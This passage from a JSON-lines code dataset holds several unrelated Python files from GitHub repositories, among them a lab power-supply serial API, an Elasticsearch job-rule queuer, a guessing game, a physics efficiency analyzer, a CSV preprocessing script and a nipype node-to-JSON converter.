unlock(self):\r\n\t\tcmd='IFUNLOCK\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\r\n\tdef lock(self):\r\n\t\tcmd='IFLOCK\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef switchOn(self, channel=1):\r\n\t\tcmd='OP'+str(channel)+' 1\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef switchOff(self, channel=1):\r\n\t\tcmd='OP'+str(channel)+' 0\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\r\n\t\t","repo_name":"pableur/CPX400DP_API","sub_path":"CPX400DP.py","file_name":"CPX400DP.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"7993548804","text":"from typing import Callable, Any\n\nfrom PyQt5.QtCore import QThread, pyqtSignal, QObject\n\n\nclass 
BackgroundEvent(QThread):\n    completed = pyqtSignal('PyQt_PyObject')\n\n    def __init__(self, task: Callable[[], Any], parent: QObject = None):\n        QThread.__init__(self, parent)\n        self.task = task\n\n    def run(self):\n        data = self.task()\n        self.completed.emit(data)\n","repo_name":"anaynayak/buildnotify","sub_path":"buildnotifylib/core/background_event.py","file_name":"background_event.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"50"} +{"seq_id":"500548308","text":"from __future__ import absolute_import\n\nimport copy, os, sys, json, requests, time, backoff, socket\n\nimport hysds\nfrom hysds.celery import app\nfrom hysds.log_utils import logger, backoff_max_tries, backoff_max_value\n\n \ndef get_job(job_id, rule, result):\n    \"\"\"Return generic json job configuration.\"\"\"\n\n    priority = rule.get('priority', 0)\n    return {\n        \"job_type\": \"job:%s\" % rule['job_type'],\n        \"priority\": priority,\n        \"payload\": {\n            \"job_id\": job_id,\n            \"rule\": rule,\n            \"rule_hit\": result,\n        }\n    }\n\n\ndef update_query(job_id, rule):\n    \"\"\"Update final query.\"\"\"\n\n    # build query\n    query = rule['query']\n\n    # filters\n    filts = []\n\n    # query all?\n    if rule.get('query_all', False) is False:\n        filts.append({ 'ids': { 'values': [job_id] }})\n\n    # build final query\n    if 'filtered' in query:\n        final_query = copy.deepcopy(query)\n        if 'and' in query['filtered']['filter']:\n            final_query['filtered']['filter']['and'].extend(filts)\n        else:\n            filts.append(final_query['filtered']['filter'])\n            final_query['filtered']['filter'] = {\n                'and': filts,\n            }\n    else:\n        final_query = {\n            'filtered': {\n                'query': query,\n                'filter': {\n                    'and': filts,\n                }\n            }\n        }\n    final_query = { \"query\": final_query }\n    logger.info(\"Final query: %s\" % json.dumps(final_query, indent=2))\n    rule['query'] = final_query\n    rule['query_string'] = json.dumps(final_query)\n\n\ndef evaluate_user_rules_job(job_id, es_url=app.conf.JOBS_ES_URL,\n                            alias=app.conf.STATUS_ALIAS,\n                            user_rules_idx=app.conf.USER_RULES_JOB_INDEX,\n                            job_queue=app.conf.JOBS_PROCESSED_QUEUE):\n    \"\"\"Process all user rules in ES database and check if this job ID matches.\n    If so, submit jobs. 
Otherwise do nothing.\"\"\"\n\n # sleep 10 seconds to allow ES documents to be indexed\n time.sleep(10)\n\n # get all enabled user rules\n query = { \"query\": { \"term\": { \"enabled\": True } } }\n r = requests.post('%s/%s/.percolator/_search?search_type=scan&scroll=10m&size=100' %\n (es_url, user_rules_idx), data=json.dumps(query))\n r.raise_for_status()\n scan_result = r.json()\n count = scan_result['hits']['total']\n scroll_id = scan_result['_scroll_id']\n rules = []\n while True:\n r = requests.post('%s/_search/scroll?scroll=10m' % es_url, data=scroll_id)\n res = r.json()\n scroll_id = res['_scroll_id']\n if len(res['hits']['hits']) == 0: break\n for hit in res['hits']['hits']:\n rules.append(hit['_source'])\n logger.info(\"Got %d enabled rules to check.\" % len(rules))\n\n # process rules\n for rule in rules:\n # sleep between queries\n time.sleep(1)\n\n # check for matching rules\n update_query(job_id, rule)\n final_qs = rule['query_string']\n r = requests.post('%s/job_status-current/job/_search' % es_url, data=final_qs)\n r.raise_for_status()\n result = r.json()\n if result['hits']['total'] == 0:\n logger.info(\"Rule '%s' didn't match for %s\" % (rule['rule_name'], job_id))\n continue\n else: doc_res = result['hits']['hits'][0]\n logger.info(\"Rule '%s' successfully matched for %s\" % (rule['rule_name'], job_id))\n #logger.info(\"doc_res: %s\" % json.dumps(doc_res, indent=2))\n\n # submit trigger task\n queue_job_trigger(doc_res, rule, es_url)\n logger.info(\"Trigger task submitted for %s: %s\" % (job_id, rule['job_type']))\n\n return True\n\n\n@backoff.on_exception(backoff.expo,\n socket.error,\n max_tries=backoff_max_tries,\n max_value=backoff_max_value)\ndef queue_finished_job(id):\n \"\"\"Queue job id for user_rules_job evaluation.\"\"\"\n\n payload = {\n 'type': 'user_rules_job',\n 'function': 'hysds.user_rules_job.evaluate_user_rules_job',\n 'args': [ id ],\n }\n hysds.task_worker.run_task.apply_async((payload,),\n queue=app.conf.USER_RULES_JOB_QUEUE)\n\n\n@backoff.on_exception(backoff.expo,\n socket.error,\n max_tries=backoff_max_tries,\n max_value=backoff_max_value)\ndef queue_job_trigger(doc_res, rule, es_url):\n \"\"\"Trigger job rule execution.\"\"\"\n\n payload = {\n 'type': 'user_rules_trigger',\n 'function': 'hysds_commons.job_utils.submit_mozart_job',\n 'args': [ doc_res, rule ],\n 'kwargs': { 'es_hysdsio_url': es_url },\n }\n hysds.task_worker.run_task.apply_async((payload,),\n queue=app.conf.USER_RULES_TRIGGER_QUEUE)\n","repo_name":"SpudButter/hysds","sub_path":"hysds/user_rules_job.py","file_name":"user_rules_job.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"42686096713","text":"import random\n\ndef jogar_adv(): \n\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Adivinhação!\")\n print(\"*********************************\")\n\n numero_secreto = random.randrange(1,101)\n tentativas = 0\n pontos = 1000\n\n print(numero_secreto)\n\n print(\"[1] FACIL [2] MÉDIO [3] DIFICIL \")\n nivel = int(input(\"Qual dificuldade voce deseja? 
\"))\n\n if(nivel == 1):\n tentativas = 12\n elif(nivel == 2):\n tentativas = 8\n else:\n tentativas = 5\n\n for rodada in range (1, tentativas + 1):\n print(\"tentativa {} de {}\".format (rodada, tentativas))\n chute_str = input(\"Digite um numero entre 1 e 100: \")\n print (\"Você Digitou \", chute_str)\n chute = int(chute_str)\n\n if( chute < 1 or chute > 100 ):\n print(\"Por favor, Digite um Numero de 1 a 100!\")\n continue\n\n acertou = numero_secreto == chute\n menor = chute < numero_secreto\n maior = chute > numero_secreto\n\n if(acertou):\n pontos_perdidos = abs(pontos - chute)\n pontos = pontos - pontos_perdidos\n print(\"Voce acertou e fez {} pontos!\".format(pontos))\n break \n else:\n if (maior):\n print(\"Voce Errou! seu numero foi maior que o numero secreto.\")\n elif (menor):\n print(\"Voce Errou! seu numero foi menor que o numero secreto.\")\n \n print(\"Fim Do Jogo!\")\n print(\"Obrigado por ter jogado!!!\")\n","repo_name":"ErycPerovani/Jogo_de_adivinhacao.py","sub_path":"adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27224684298","text":"import math\nimport ROOT as R\nimport DisplacedDimuons.Analysis.Selections as Selections\nimport DisplacedDimuons.Analysis.Analyzer as Analyzer\nimport DisplacedDimuons.Common.Utilities as Utilities\nfrom DisplacedDimuons.Analysis.AnalysisTools import matchedMuons, matchedDimuons\n\n# CONFIG stores the title and axis tuple so that the histograms can be declared in a loop\nHEADERS = ('XTITLE', 'AXES', 'LAMBDA', 'PRETTY', 'ACC_LAMBDA')\nVALUES = (\n ('pT' , 'p_{T} [GeV]' , (1500, 0., 1500.), lambda gmu : gmu.pt , 'p_{T}' , lambda sel: sel.allExcept('a_pT' )),\n ('eta' , '#eta' , (1000, -3., 3.), lambda gmu : gmu.eta , '#eta' , lambda sel: sel.allExcept('a_eta')),\n ('phi' , '#phi' , (1000, -math.pi, math.pi), lambda gmu : gmu.phi , '#phi' , lambda sel: sel ),\n ('Lxy' , 'L_{xy} [cm]' , (1000, 0., 800.), lambda gmu : gmu.Lxy() , 'L_{xy}' , lambda sel: sel.allExcept('a_Lxy')),\n ('d0' , 'd_{0} [cm]' , (1000, 0., 600.), lambda gmu : gmu.d0() , 'd_{0}' , lambda sel: sel ),\n ('dR' , '#DeltaR(#mu#mu)' , (1000, 0., 5.), lambda pair: pair[0].deltaR , '#DeltaR' , lambda sel: sel ),\n ('dphi', '#Delta#phi(#mu#mu)', (1000, -math.pi, math.pi), lambda pair: pair[0].p4.DeltaPhi(pair[1].p4), '#Delta#phi', lambda sel: sel ),\n)\nCONFIG = {}\nfor VAL in VALUES:\n KEY, VALS = VAL[0], VAL[1:]\n CONFIG[KEY] = dict(zip(HEADERS, VALS))\n\n#### CLASS AND FUNCTION DEFINITIONS ####\n# declare histograms for Analyzer class\ndef declareHistograms(self, PARAMS=None):\n for KEY in CONFIG:\n # one Eff, ChargeEff, and ChargeDen plot for each of DSA and RSA\n for MUON in ('DSA', 'RSA', 'REF'):\n TITLE = ';'+CONFIG[KEY]['XTITLE']+';'+MUON+' Reconstruction Efficiency'\n self.HistInit(MUON+'_'+KEY+'Eff' , TITLE, *CONFIG[KEY]['AXES'])\n TITLE = TITLE.replace('Reconstruction', 'Charge Reconstruction')\n self.HistInit(MUON+'_'+KEY+'ChargeEff', TITLE, *CONFIG[KEY]['AXES'])\n self.HistInit(MUON+'_'+KEY+'ChargeDen', '' , *CONFIG[KEY]['AXES'])\n\n # gen denominator plots, can reuse the axes\n self.HistInit(KEY+'Den' , '', *CONFIG[KEY]['AXES'])\n self.HistInit('REF_'+KEY+'Den' , '', *CONFIG[KEY]['AXES'])\n\n # descoping extra; not really needed anymore\n\n# internal loop function for Analyzer class\ndef analyze(self, E, PARAMS=None):\n if self.SP is None:\n raise Exception('[ANALYZER ERROR]: This script runs on signal only.')\n if 
self.TRIGGER:\n if not Selections.passedTrigger(E): return\n if '4Mu' in self.NAME:\n mu11, mu12, mu21, mu22, X1, X2, H, P, extramu = E.getPrimitives('GEN')\n genMuons = (mu11, mu12, mu21, mu22)\n genMuonPairs = ((mu11, mu12), (mu21, mu22))\n elif '2Mu2J' in self.NAME:\n mu1, mu2, j1, j2, X, XP, H, P, extramu = E.getPrimitives('GEN')\n genMuons = (mu1, mu2)\n genMuonPairs = ((mu1, mu2),)\n DSAmuons = E.getPrimitives('DSAMUON')\n RSAmuons = E.getPrimitives('RSAMUON')\n Dimuons = E.getPrimitives('DIMUON' )\n\n ALL = True if 'All' in self.CUTS else False\n # require reco muons to pass all selections\n if ALL:\n DSASelections = [Selections.MuonSelection(muon) for muon in DSAmuons]\n RSASelections = [Selections.MuonSelection(muon) for muon in RSAmuons]\n selectedDSAmuons = [mu for idx,mu in enumerate(DSAmuons) if DSASelections [idx]]\n selectedRSAmuons = [mu for idx,mu in enumerate(RSAmuons) if RSASelections [idx]]\n selectedDimuons = Dimuons\n\n # don't require reco muons to pass all selections\n else:\n selectedDSAmuons = DSAmuons\n selectedRSAmuons = RSAmuons\n selectedDimuons = Dimuons\n\n # loop over genMuons and fill histograms based on matches\n for genMuonPair in genMuonPairs:\n # genMuonMatches are a dictionary of the return tuple of length 3\n # DSA and RSA get a doDimuons=False argument so that no dimuon matching will be done\n genMuonMatches = {'DSA':None, 'RSA':None, 'REF':None}\n for MUON, recoMuons in (('DSA', selectedDSAmuons), ('RSA', selectedRSAmuons)):\n genMuonMatches[MUON] = matchedDimuons(genMuonPair, selectedDimuons, recoMuons, vertex='BS', doDimuons=False)\n for MUON in ('REF',):\n genMuonMatches['REF'] = matchedDimuons(genMuonPair, selectedDimuons)\n\n # now figure out the closest match, or None if they overlap\n # exitcode helps to make sure that both gen muons never match the same reco muon\n genMuonMatch = [{'DSA': None, 'RSA': None, 'REF': None}, {'DSA': None, 'RSA': None, 'REF': None}]\n for MUON in ('DSA', 'RSA'):\n dimuonMatches, muonMatches, exitcode = genMuonMatches[MUON]\n genMuonMatch[0][MUON], genMuonMatch[1][MUON] = exitcode.getBestGenMuonMatches(muonMatches)\n\n # matched refitted muons if there was at least one dimuon\n for MUON in ('REF',):\n dimuonMatches, muonMatches, exitcode = genMuonMatches['REF']\n if len(dimuonMatches) > 0:\n genMuonMatch[0]['REF'] = muonMatches[0][0]\n genMuonMatch[1]['REF'] = muonMatches[1][0]\n\n # now loop over the quantities and fill. 
split by whether it's a mu plot or a mumu plot\n genMuonPairSelection = Selections.AcceptanceSelection(genMuonPair)\n genMuonSelections = [Selections.AcceptanceSelection(genMuonPair[0]), Selections.AcceptanceSelection(genMuonPair[1])]\n for KEY in CONFIG:\n F = CONFIG[KEY]['LAMBDA']\n AF = CONFIG[KEY]['ACC_LAMBDA']\n\n # mumu plots: check if pair in acceptance, fill den, fill num if both match\n if KEY == 'dphi' or KEY == 'dR':\n if AF(genMuonPairSelection):\n self.HISTS[ KEY+'Den'].Fill(F(genMuonPair))\n self.HISTS['REF_'+KEY+'Den'].Fill(F(genMuonPair))\n\n for MUON in ('DSA', 'RSA', 'REF'):\n if genMuonMatch[0][MUON] is not None and genMuonMatch[1][MUON] is not None:\n self.EffPairFill(MUON, KEY, genMuonPair, genMuonMatch, F)\n\n # mu plots: for DSA and RSA, check if gen muon in acceptance, fill den, fill num if match\n # for REF, check if pair in acceptance, fill den, full num if both match\n else:\n for idx, genMuon in enumerate(genMuonPair):\n if AF(genMuonSelections[idx]):\n self.HISTS[KEY+'Den'].Fill(F(genMuon))\n\n for MUON in ('DSA', 'RSA'):\n if genMuonMatch[idx][MUON] is not None:\n self.EffSingleFill(MUON, KEY, genMuon, genMuonMatch, F, idx)\n\n if AF(genMuonPairSelection):\n self.HISTS['REF_'+KEY+'Den'].Fill(F(genMuon))\n\n for MUON in ('REF',):\n if genMuonMatch[0][MUON] is not None and genMuonMatch[1][MUON] is not None:\n self.EffSingleFill(MUON, KEY, genMuon, genMuonMatch, F, idx)\n\n# modular fill functions for use above: gen muon pair\ndef EffPairFill(self, MUON, KEY, genMuonPair, genMuonMatch, F):\n\n # first fill the eff plot; the numerator is the denominator for charge\n self.HISTS[MUON+'_'+KEY+'Eff' ].Fill(F(genMuonPair))\n self.HISTS[MUON+'_'+KEY+'ChargeDen'].Fill(F(genMuonPair))\n\n # THEN if the charges are the same, fill. Should be flat and close to 1.\n closestRecoMuons = [genMuonMatch[0][MUON]['muon'], genMuonMatch[1][MUON]['muon']]\n if genMuonPair[0].charge == closestRecoMuons[0].charge and genMuonPair[1].charge == closestRecoMuons[1].charge:\n self.HISTS[MUON+'_'+KEY+'ChargeEff'].Fill(F(genMuonPair))\n\n# modular fill functions for use above: individual gen muon\ndef EffSingleFill(self, MUON, KEY, genMuon, genMuonMatch, F, idx):\n\n # first fill the eff plot; the numerator is the denominator for charge\n self.HISTS[MUON+'_'+KEY+'Eff' ].Fill(F(genMuon))\n self.HISTS[MUON+'_'+KEY+'ChargeDen'].Fill(F(genMuon))\n\n # THEN if the charges are the same, fill. 
Should be flat and close to 1.\n    closestRecoMuon = genMuonMatch[idx][MUON]['muon']\n    if genMuon.charge == closestRecoMuon.charge:\n        self.HISTS[MUON+'_'+KEY+'ChargeEff'].Fill(F(genMuon))\n\n#### RUN ANALYSIS ####\nif __name__ == '__main__':\n    ARGS = Analyzer.PARSER.parse_args()\n    Analyzer.setSample(ARGS)\n    for METHOD in ('declareHistograms', 'analyze', 'EffPairFill', 'EffSingleFill'):\n        setattr(Analyzer.Analyzer, METHOD, locals()[METHOD])\n    analyzer = Analyzer.Analyzer(\n        ARGS = ARGS,\n        BRANCHKEYS = ('GEN', 'DSAMUON', 'RSAMUON', 'TRIGGER', 'DIMUON'),\n    )\n    analyzer.writeHistograms('roots/SignalRecoEffPlots{}{}_{{}}.root'.format('_Trig' if ARGS.TRIGGER else '', ARGS.CUTS))\n","repo_name":"rijuvenator/DisplacedDimuons","sub_path":"Analysis/analyzers/signalRecoEffPlots.py","file_name":"signalRecoEffPlots.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16586038152","text":"from turtle import *\r\ncolors = ['red', 'blue', 'brown', 'yellow', 'grey']\r\nfor i in range (5):\r\n    color(colors[i], colors[i])\r\n    begin_fill()\r\n    for j in range (2):\r\n        forward(50)\r\n        left(90)\r\n        forward(100)\r\n        left(90)\r\n    end_fill()\r\n    forward(50)\r\n","repo_name":"dragon15098/bai-3","sub_path":"Turtle exercises 2.py","file_name":"Turtle exercises 2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"29358591321","text":"# -*- coding: utf-8 -*-\n#Ekaum Soni\n#01/24/2022\n#\n#Preparing Data Sets\nimport csv, os\n\n\n# os.system('clear')\n# #Pandas is superior\n# import pandas as pd\n# insuranceCSV = pd.read_csv(\"insurance_data - insurance.csv\")\n\nfile = open('insurance_data - insurance.csv')\ninsuranceFile = csv.reader(file)\n\n\n#Bring up next value\nheader = next(insuranceFile)\n\ninsuranceData = []\n\n\n#Make one whole list out of every separate list\nfor row in insuranceFile:\n    insuranceData.append(row)\n\n#Change Female to 0, Male to 1\n\nfor row in insuranceData:\n    if row[1] == 'female':\n        row[1] = 0\n    if row[1] == 'male':\n        row[1] = 1\n\n\nfor row in insuranceData:\n    if row[4] == 'no':\n        row[4] = 0\n    if row[4] == 'yes':\n        row[4] = 1\n\n#Add Insurance Cost to List\n\nfor row in insuranceData:\n    insurance_cost = 250*int(row[0]) - 128*int(row[1]) + 370*float(row[2]) + 425*int(row[3]) + 24000*int(row[4]) - 12500\n    insurance_cost = int(insurance_cost*100)/100\n    row.append(insurance_cost)\n    \n#Create List with averages of 4 regions\n\nSouthwest_Total = 0 \nNortheast_Total = 0 \nSoutheast_Total = 0\nNorthwest_Total = 0\ncountNE = 0 \ncountSE = 0\nCountNW = 0\nCountSW = 0\n\n\nfor row in insuranceData:\n    if row[5] == 'northeast':\n        Northeast_Total += row[7] \n        countNE +=1\n        NE_AVG = Northeast_Total/countNE\n    if row[5] == 'southeast':\n        Southeast_Total += row[7] \n        countSE +=1\n        SE_AVG = Southeast_Total/countSE\n    if row[5] == 'northwest': \n        Northwest_Total += row[7] \n        CountNW += 1\n        NW_AVG = Northwest_Total/CountNW\n    if row[5] == 'southwest':\n        Southwest_Total += row[7] \n        CountSW += 1\n        SW_AVG = Southwest_Total/CountSW\n\nRegion_AVG = [NE_AVG, SE_AVG, NW_AVG, SW_AVG]\n\n#Create a list with Only Females, and one with Only Males (sex was recoded to 0/1 above)\nList_Female = []\nList_Male = []\n\nfor row in insuranceData:\n    if row[1] == 0:\n        List_Female.append(row)\n    if row[1] == 1:\n        List_Male.append(row)\n\n\n#Create a list with only Smokers, and one with non Smokers (smoker was recoded to 0/1 above)\nList_Smokers = []\nList_NonSmokers = []\n\n\nfor row 
in insuranceData:\n    if row[4] == 0:\n        List_NonSmokers.append(row)\n    if row[4] == 1:\n        List_Smokers.append(row)\n\n","repo_name":"EkaumSoni/Ekaum_DataScience","sub_path":"InsuranceData.py","file_name":"InsuranceData.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22208990879","text":"from setuptools import setup, find_packages\nimport os\n\ndef read(fname):\n    return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n    name='odoo_helper',\n    version='0.1.1',\n    packages=find_packages(),\n    url='https://github.com/dharmendrasha/odoo_python',\n    license='GNU',\n    author='dharmendra',\n    author_email='dharmendrashah2002@yahoo.com',\n    description='simple helper library for connecting database with odoo',\n    keywords=\"odoo sdk api database package\",\n    long_description=read('README.md'),\n    long_description_content_type='text/markdown',\n    classifiers=[\n        \"Development Status :: 4 - Beta\",\n        \"Topic :: Database\",\n        \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n    ],\n    python_requires='>=3.6', # Minimum version requirement of the package\n    install_requires=[] # Install other dependencies if any\n) \n","repo_name":"dharmendrasha/odoo_python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16059112885","text":"from xtlib import errors\n\nclass Scanner():\n    def __init__(self, text):\n        self.text = text\n        self.len = len(text)\n        self.index = 0\n        self.token_type = None\n        self.token = None\n        self.prev_index = 0\n        #console.print(\"Scanner created, text=\", text)\n\n    def scan(self, allow_extended_ids=True):\n        self.prev_index = self.index\n        \n        text = self.text\n\n        # skip spaces\n        while self.index < self.len:\n            if text[self.index] == ' ':\n                self.index += 1\n            else:\n                break\n\n        if self.index >= self.len:\n            self.token_type = \"eol\"\n            self.token = None\n        else:\n            ch = text[self.index]\n            start = self.index\n            self.index += 1\n\n            if self.index < self.len:\n                ch_next = text[self.index]\n            else:\n                ch_next = None\n\n            if allow_extended_ids and ch.lower() in '~/_abcdefghijklmnopqrstuvwxyz*?$-' or (ch == \".\" and ch_next in [\".\", \"/\", \"\\\\\"]):\n                # scan an ID or FILENAME or a WILDCARD or box-addr\n                while self.index < self.len and text[self.index].lower() in '/@._-abcdefghijklmnopqrstuvwxyz0123456789?*:/\\\\':\n                    self.index += 1\n                self.token_type = \"id\"\n                self.token = text[start:self.index]\n            elif not allow_extended_ids and ch.lower() in '_abcdefghijklmnopqrstuvwxyz': \n                # scan a simple ID\n                while self.index < self.len and text[self.index].lower() in '_abcdefghijklmnopqrstuvwxyz0123456789.-':\n                    self.index += 1\n                self.token_type = \"id\"\n                self.token = text[start:self.index]\n            elif ch in '.0123456789':\n                # scan a NUMBER\n                while self.index < self.len and text[self.index] in '.0123456789':\n                    self.index += 1\n                # allow for tags that start with a number but contain letters, and \"_\"\n                ch = text[self.index] if self.index < self.len else None\n\n                if ch and ch.isalpha() and not \".\" in text[start:self.index-1]:\n                    while self.index < self.len and text[self.index].lower() in '_abcdefghijklmnopqrstuvwxyz0123456789.-':\n                        self.index += 1 \n                    self.token_type = \"id\"\n                    self.token = text[start:self.index]\n                else:\n                    self.token_type = \"number\"\n                    self.token = text[start:self.index]\n            elif ch == '\"' or ch == \"'\":\n                # scan a 
STRING\n quote = ch\n last_ch = \"\"\n while self.index < self.len:\n if text[self.index] == quote and last_ch != \"\\\\\":\n break\n last_ch = text[self.index]\n self.index += 1\n\n if text[self.index] != quote:\n errors.raise_error(\"Unterminated string at offset=\" + str(start) + \" in cmd: \" + text)\n\n self.token_type = \"string\"\n self.index += 1 # skip over the ending quote\n self.token = text[start+1:self.index-1]\n # un-embed contained quotes\n self.token = self.token.replace(\"\\\\\" + quote, quote)\n else:\n # scan a special char\n self.token_type = \"special\"\n self.token = ch\n if self.index < self.len:\n ch2 = ch + self.text[self.index]\n #console.print(\"ch2=\", ch2)\n if ch2 in [\"--\", \"<=\", \">=\", \"!=\", \"<>\", \"==\"]:\n self.index += 1\n self.token = ch2\n\n #console.print(\"scanner.scan returning=\", self.token, \", type=\", self.token_type)\n return self.token\n\n def save_state(self):\n state = Scanner(self.text)\n state.len = self.len\n state.index = self.index\n state.token_type = self.token_type\n state.token = self.token\n return state\n\n def restore_state(self, state):\n self.text = state.text\n self.len = state.len\n self.index = state.index\n self.token_type = state.token_type\n self.token = state.token\n\n def peek(self):\n # peek ahead 1 token\n state = self.save_state()\n tok = self.scan()\n state = self.restore_state(state)\n return tok\n\n def get_rest_of_text(self, include_current_token=False):\n if include_current_token:\n text = self.text[self.prev_index:]\n else:\n text = self.text[self.index:]\n\n # show input all processed\n self.token = text\n self.index = len(self.text)\n self.token_type = \"text\"\n\n self.text = text\n self.len = len(text)\n\n return text\n ","repo_name":"microsoft/ExperimentTools","sub_path":"xtlib/helpers/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"50"} +{"seq_id":"30332530033","text":"\"\"\" nipype2json.py\n\nMakes a Porcupine-compatible dictionary of nodes.\nCreated by Tomas Knapen (Free University, Amsterdam) &\nLukas Snoek (University of Amsterdam)\n\"\"\"\nimport inspect\nimport importlib\nimport os.path as op\nfrom copy import copy\n\n\ndef node2json(node, node_name=None, module=None, custom_node=False,\n module_path=None):\n \"\"\" Converts nipype nodes to Porcupine-compatible json-files.\n\n This function takes a Nipype node from a Python module and\n creates a Porcupine json-file.\n\n Parameters\n ----------\n node : Nipype Node object\n Nipype node to create a json-dict for.\n module : str\n Name of module in which node is contained.\n custom_node : bool\n Whether the node is a custom node or a node within\n the Nipype package.\n category : str\n Category of node (default: \"Custom\")\n module_path : str\n Path to module (only relevant for custom modules)\n \"\"\"\n\n if node_name is None and custom_node:\n raise ValueError(\"Cannot infer node-name from custom-nodes! 
Please \"\n \"set the argument `node_name` correctly!\")\n\n if node_name is None:\n node_name = _get_node_name(node)\n\n # node_name = node_name.replace('_', '\\_')\n\n all_inputs, mandatory_inputs = _get_inputs(node, custom_node)\n all_outputs = _get_outputs(node, custom_node)\n descr = _get_descr(node, node_name, custom_node)\n\n if custom_node:\n category = 'Custom'\n else:\n category = 'Nipype'\n\n this_category = [category]\n if module.split('.')[0] == 'algorithms':\n this_category.append('algorithms')\n\n if custom_node:\n this_category.append(module)\n else:\n this_category.append(module.split('.')[1])\n\n interface_name = copy(this_category)\n\n if not custom_node:\n sub_modules = _get_submodule(node)[1:]\n if sub_modules and sub_modules[0] != this_category[-1]:\n this_category.extend(sub_modules)\n\n web_url = _get_web_url(node, module, custom_node)\n import_statement = _get_import_statement(node, module, module_path)\n init_statement = _get_init_statement(interface_name, node_name, custom_node)\n\n titleBlock = {\n\n 'name': '%s.%s' % (interface_name[-1], node_name),\n 'web_url': web_url,\n 'code': [{\n 'language': 'Nipype',\n 'comment': descr,\n 'argument': {\n \"name\": init_statement,\n \"import\": import_statement\n }\n }]\n }\n\n titleBlock['code'].append({\n 'language': 'Docker',\n 'argument': {\n \"name\": \", \".join(interface_name)\n }\n })\n\n ports = []\n\n for inp in all_inputs:\n codeBlock = {\n 'language': 'Nipype',\n 'argument': {\n \"name\": inp\n }\n }\n\n is_mandatory = inp in mandatory_inputs\n\n port = {\n 'input': True,\n 'output': False,\n 'visible': True if is_mandatory else False,\n 'editable': True,\n 'name': inp,\n 'code': [codeBlock]\n }\n\n ports.append(port)\n\n ports = sorted(ports, reverse=True, key=lambda p: p['visible'])\n\n for outp in all_outputs:\n\n codeBlock = {\n 'language': 'Nipype',\n 'argument': {\n \"name\": outp\n }\n }\n\n port = {\n 'input': False,\n 'output': True,\n 'visible': True,\n 'editable': False,\n 'name': outp,\n 'code': [codeBlock]\n }\n ports.append(port)\n\n node_to_return = {\n 'category': this_category,\n 'title': titleBlock,\n 'ports': ports\n }\n return node_to_return\n\n\ndef _get_inputs(node, custom_node=True):\n\n all_inputs, mandatory_inputs = [], []\n if custom_node:\n TO_SKIP = ['function_str', 'trait_added', 'trait_modified',\n 'ignore_exception']\n all_inputs.extend([inp for inp in node.inputs.traits().keys()\n if inp not in TO_SKIP])\n mandatory_inputs.extend(all_inputs)\n else:\n all_inputs.extend([inp for inp in node.input_spec().traits().keys()\n if not inp.startswith('trait')])\n mandatory_inputs.extend(node.input_spec().traits(mandatory=True).keys())\n\n return all_inputs, mandatory_inputs\n\n\ndef _get_outputs(node, custom_node=True):\n\n if custom_node:\n TO_SKIP = ['trait_added', 'trait_modified']\n outputs = list(node.aggregate_outputs().traits().keys())\n all_outputs = [outp for outp in outputs\n if not outp in TO_SKIP]\n else:\n if hasattr(node, 'output_spec'):\n if node.output_spec is not None:\n all_outputs = [outp for outp in node.output_spec().traits().keys()\n if not outp.startswith('trait')]\n else:\n all_outputs = []\n else:\n all_outputs = []\n\n return all_outputs\n\n\ndef _get_descr(node, node_name, custom_node):\n\n if custom_node:\n descr = 'Custom interface wrapping function %s' % node_name\n else:\n if hasattr(node, 'help'):\n descr = node.help(returnhelp=True).splitlines()[0]\n else:\n descr = node.__name__\n\n return descr\n\n\ndef _get_web_url(node, module, custom_node):\n\n if 
custom_node:\n return ''\n\n is_algo = module.split('.')[0] == 'algorithms'\n\n web_url = 'https://nipype.readthedocs.io/en/latest/interfaces/generated/'\n\n all_sub_modules = _get_submodule(node)\n\n if is_algo or len(all_sub_modules) < 2:\n module = 'nipype.' + module\n\n web_url += module\n\n if len(all_sub_modules) > 1:\n\n if not is_algo:\n web_url += '/%s.html' % all_sub_modules[1]\n else:\n web_url += '.html'\n\n web_url += '#%s' % node.__name__.lower()\n else:\n web_url += '.html#%s' % node.__name__.lower()\n\n return web_url\n\n\ndef _get_node_name(node):\n\n return node.__name__\n\n\ndef _get_import_statement(node, module, module_path):\n\n try:\n importlib.import_module('nipype.' + module)\n import_statement = \"import nipype.%s as %s\" % (module, module.split('.')[-1])\n except ImportError:\n\n import_statement = ''\n if module_path is not None:\n import_statement += \"sys.path.append('%s')\\n\" % (op.abspath(op.dirname(module_path)))\n\n import_statement += 'import %s' % module\n\n return import_statement\n\n\ndef _get_init_statement(interface_name, node_name, custom_node):\n\n if custom_node:\n init_statement = interface_name[-1] + '.%s' % node_name\n else:\n init_statement = interface_name[-1] + '.%s()' % node_name\n\n return init_statement\n\n\ndef _get_submodule(node):\n\n module_tree = 